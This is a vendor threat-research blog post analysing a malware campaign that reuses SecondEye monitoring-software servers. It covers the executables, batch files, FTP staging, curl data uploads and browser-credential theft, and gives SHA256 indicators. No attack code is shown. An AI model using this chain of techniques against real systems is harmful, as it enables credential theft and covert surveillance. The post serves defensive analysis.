2020 was a paradigm-shifting moment for many businesses. While some have reverted, others are continuing onwards with new ways of working. Back in 2019, less than 6% of Americans worked from home. Now, 58% of U.S. adults have the option to work from home at least one day a week, and 86% of them take advantage of it. The problem facing leadership then is, how do you monitor productivity?
The solution comes in the form of monitoring software. Capabilities across these tools include, but are not limited to, screen recording, logging keystrokes, and live screen viewing. Many of these software solutions are marketed to ensure the safety of intellectual property and integrate enterprise-level threat detection.
Nevertheless, the concern then becomes, what happens when an enterprise solution is used maliciously? Unfortunately, these same capabilities are often present in malicious binaries, as well as threat actor playbooks. Take SecondEye for example. Earlier this year, Blackpoint identified and responded to two identical suspicious File Transfer Protocol (FTP) events connected to a server in Iran within a two-month span. This server was determined to belong to SecondEye.
Information surrounding SecondEye is limited—the company domain has been suspended and can be found in the Akamai Blocklist. Therefore, attempting to navigate to the IP address for the Iranian server returns no response. However, the website is still being hosted and can be accessed using a German server. SecondEye markets their system as a staff monitoring or parental control system but does indeed acknowledge that their product can be used for illegal activities, surveillance, or espionage (see Figure 1). Based on a combination of open-source intelligence (OSINT) and analysis, Blackpoint believes SecondEye to be Iranian.
The initial IP in Iran was identified as being owned by SecondEye using Shodan, a website that provides OSINT. A further search using the ‘Resolver name’ showed another server located in Germany (see Figure 2). Examination of port information showed them to both be running an Apache web server and Pure-FTP, but only the German server was hosting the SecondEye website.
The site was created by ‘UltimateSoft Co’, a web and development company in Iran. Upon evaluation, the services offered appear to be remarkably similar to other enterprise monitoring solutions with the level of access dependent on the chosen package (see Figure 3).
This is where the front ends, though. None of these packages are available for purchase. Instead, the user is taken to a login page for SecondEye. Further examination showed only two other links to be active—one to ‘UltimateSoft Co’ and another to an Instagram page that no longer exists (see Figure 4).
Based on analysis performed by Blackpoint, it is not believed that the initial payload utilized in these attacks is part of the SecondEye product. Instead, it looks as though select components of the SecondEye product have been circumvented by the threat actors, along with utilization of the SecondEye infrastructure for data and payload storage. Blackpoint also observed that the threat actors are interchanging the naming prefix between win and sys across their files. For example, sysBus32 and winBus32—however, the structure remains the same.
Blackpoint has identified two binaries of the sysBus32.exe/winBus32.exe executable, which is the initial payload deployed by the threat actors. Each binary will attempt to make an FTP connection to a given server using a hardcoded value. Also contained within these binaries is the username and password for interacting with the servers. These login credentials are neither obfuscated nor encrypted (see Figure 5).
These credentials were crafted into a formatted output string using ‘sprintf’, where it is then sent to a new function containing ‘CreateProcessA’. This new function is used to launch .bat files utilized to perform a different behavior on the endpoint (see Figure 6).
Blackpoint has identified six critical files that are part of the threat actor deployment.
The sysInit32.bat/winInit32.bat file is responsible for acquiring the secondary stages of the malicious deployment and placing them into the ‘%LOCALAPPDATA%\Microsoft\WindowsApps\’ directory (see Figure 7).
It should be noted that this file, as well as an instance of curl and 7zip, were found alongside the sysBus32.bat/winBus32.bat executable that was dropped during the initial deployment. As can be seen in Figure 7 above, the batch file is provided with the IP address, username, and password of the FTP server, as well as the password for unpacking the zip file. These are hardcoded values contained within sysBus32.bat/winBus32.bat. The execution of the batch file is then proceeded by a 90-second sleep to allow for the acquisition, unpacking, and subsequent deletion of the zip file (see Figure 8).
The sysList32.bat is one of the files contained within the second stage zip folder downloaded and unpacked by sysBus32.bat/winBus32.bat. It is used to acquire the sysList32.php file from the FTP server. It will then attempt to find the combination of ‘%COMPUTERNAME%_%USERNAME%’ within the file.
No image of this file will be provided, as during the investigation, the instance of sysList.php contained clearly compromised devices and usernames. What is worth noting however, is that based on analysis, all devices and usernames were Iranian.
The send_params.bat file is responsible for updating the FTP server with the latest victim information. While the server is still the same IP address, the username and password the data is uploaded to is not. However, again, these three values are hardcoded and in plain text within the sysBus32.exe/winBus32.exe file. These parameters are passed through to the send_params.bat file along with the Global Unique Identifier (GUID) and Device name of the victim machine. This data is then sent to the FTP server as a POST request using curl.exe (see Figure 9). One interesting parameter within the data sent is the hardcoded ‘is_rat=true’ statement. This would insinuate that the device is a viable backdoor into the network.
This file uses netstat to determine if a connection has been opened to the SecondEye server on port 993 (see Figure 10).
The sysUp32.bat file is one of the few that Blackpoint has not identified a winUp32.bat version for. This file is quite different than the sysUpdt32.bat file, which can also be found on the device that pulls the sysUpdt32.php file. The sysUp32.bat is responsible for harvesting the credentials from different browsers, placing them into a zip file, and transferring them to the FTP server under a dedicated folder based on the Computer Name and Username (see Figure 11). For Mozilla Firefox, the threat actors ensure that they handle both the old and new deployment instances. For Google Chrome, the threat actors invoke libchrome.exe, which is a file native SecondEye.
Of the observed scripts mentioned above, only sysInit32.bat/winInit32.bat, sysList32.bat, and sysUp32.bat were observed being attempted by the threat actors and, apart from sysInit32.bat/winInit32.bat, Blackpoint has seen no evidence to suggest these files are part of the core SecondEye capabilities. Based on our research, the only core capability utilized by the threat actors is libchrome.exe, which is used to harvest Google Chrome credentials. Beyond this, the only other main feature utilized is the SecondEye servers themselves. It is presently not possible to determine what specific credentials the threat actors were after, but Blackpoint will continue to monitor for events.
That said, Iran has a history of dealing with cryptocurrencies. In early 2021, an Iranian software company was linked to the MrbMiner cryptojacking campaign. At the end of 2021, Iran placed a ban on the mining of cryptocurrency without special licenses. Then, in 2022, Blackpoint identified Iranian crypto ransomware unsuccessfully attempting to target some of its customers. Most recently, Iran made a $10 million dollar import order using cryptocurrency to bypass U.S. sanctions, given the reliance on cryptocurrency for the economic wellbeing of the country. Therefore, it is possible that this software is being used to identify and monitor Iranian nationals, for either theft, or more alarmingly, to ensure they comply with selling their currencies to the central bank of Iran.
While the use of any corporate monitoring software is accepted, at its heart it operates no differently from malware. Companies, as seen with SecondEye, will dissolve themselves of responsibility by stating that it’s the end user’s responsibility to use the software appropriately. Other companies even offer free trials with only a valid email required for verification. With all this in mind, security companies now need to keep an eye out for illegal malware and, more worryingly, legal malware.
Indicators of Compromise
|Iranian SecondEye Server
|German SecondEye Server
SHA256 sysBus and winBus
Sha256 | 860828F1F1CBFFFDE5211788028C006C2BD758DC9DFDC2811E75262DDBC57C74
- File Name: sysBus32.exe
- File Type: Executable
- File Size: 12.0KB
Sha256 | 8A655FE18CAA93DE64D6CA6657D6009AEF7C0F8E6D6BF7074E4446451165F607
- File Name: winBus32.exe
- File Type: Executable
- File Size: 12.50KB
Tactics, Techniques, and Procedures
About Blackpoint Cyber
Blackpoint Cyber is a provider of leading-edge cybersecurity threat hunting, detection, and response technology. Founded by former United States Department of Defense (DoD) and intelligence security experts, we fuse real security with real response to protect what’s most important to you. Our true, 24/7 Managed Detection & Response (MDR) service works in tandem with our Security Operations Center (SOC) team to take in real-time threat alerts, respond immediately, and eradicate malicious actors’ access to your networks. Before lateral movement can happen, trust Blackpoint to eliminate any chance of further compromise. If you’re interested in decades of extensive knowledge in real-world defensive and offensive tactics protecting you and your clients’ business, contact us today!